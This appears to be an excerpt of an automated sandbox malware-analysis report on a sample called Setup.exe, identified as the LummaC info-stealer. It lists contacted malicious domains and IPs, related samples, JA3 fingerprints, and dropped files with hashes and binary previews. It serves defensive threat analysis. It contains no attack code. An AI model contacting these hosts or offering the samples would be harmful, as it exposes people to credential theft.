                                                                                                                                                                                  https://abberanteusz.click:443/apiSetup.exe, 00000000.00000003.1856495243.00000000006AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://abberanteusz.click/api:Setup.exe, 00000000.00000003.1972142744.000000000064C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      		unknown

                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                      Public IPs

                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      104.21.37.128
                                                                                                                                                                                      		klipvumisui.shopUnited States
                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      172.67.198.102
                                                                                                                                                                                      		abberanteusz.clickUnited States
                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                      185.161.251.21
                                                                                                                                                                                      		cegu.shopUnited Kingdom
                                                                                                                                                                                      		5089NTLGBfalse

                                                                                                                                                                                      General Information

                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                      Analysis ID:1583071
                                                                                                                                                                                      Start date and time:2025-01-01 19:03:05 +01:00
                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 8m 29s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:38
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Sample name:Setup.exe
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@59/15@4/3
                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                      • Successful, ratio: 33.3%
                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                      Warnings

                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                      • Execution Graph export aborted for target BrightLib.exe, PID 7628 because there are no executed function
                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7640 because it is empty
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                      Simulations

                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                      13:04:08API Interceptor8x Sleep call for process: Setup.exe modified
                                                                                                                                                                                      13:04:19API Interceptor20x Sleep call for process: powershell.exe modified
                                                                                                                                                                                      13:05:11API Interceptor1x Sleep call for process: BrightLib.exe modified

                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                      IPs

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      104.21.37.128Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                        re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                  installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                        172.67.198.102UgHXEfw1uL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.tqmsn.com/bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcp
                                                                                                                                                                                                        185.161.251.21SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                              Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          cegu.shopSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          abberanteusz.clickActive_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          klipvumisui.shopActive_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 172.67.208.58
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 172.67.208.58
                                                                                                                                                                                                                          @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 172.67.208.58
                                                                                                                                                                                                                          installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.37.128

                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          CLOUDFLARENETUSSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.21.16
                                                                                                                                                                                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.21.16
                                                                                                                                                                                                                          web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.21.16
                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 172.67.219.133
                                                                                                                                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                          yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.92.91
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          CLOUDFLARENETUSSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.21.16
                                                                                                                                                                                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.21.16
                                                                                                                                                                                                                          web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.21.16
                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 172.67.219.133
                                                                                                                                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                          yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.92.91
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          NTLGBloligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                          • 81.104.109.62
                                                                                                                                                                                                                          SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 80.4.160.37
                                                                                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21

                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.37.128
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          • 185.161.251.21

                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeActive_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dllqnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                      MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          !Setup.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                                                                                                                                            MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                                                                                                                                            SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                                                                                                                                            SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                                                                                                                                            SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:@...e.................................,..............@..........

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\5b9cb0ef

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6447207
                                                                                                                                                                                                                                                            Entropy (8bit):7.998441497232368
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                                                                                                                            MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                                                                                                                            SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                                                                                                                            SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                                                                                                                            SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):8767044
                                                                                                                                                                                                                                                            Entropy (8bit):7.960152326344281
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                                                                                                                            MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                                                                                                                            SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                                                                                                                            SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                                            • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54sxp1xi.lbk.psm1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ec3hpvxp.ece.psm1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mt42d3c4.fou.ps1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuqplgss.myh.ps1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
